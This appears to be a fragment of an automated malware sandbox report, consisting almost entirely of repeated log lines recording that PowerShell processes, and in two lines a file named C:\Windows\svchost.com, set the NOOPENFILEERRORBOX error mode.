                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\svchost.com Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
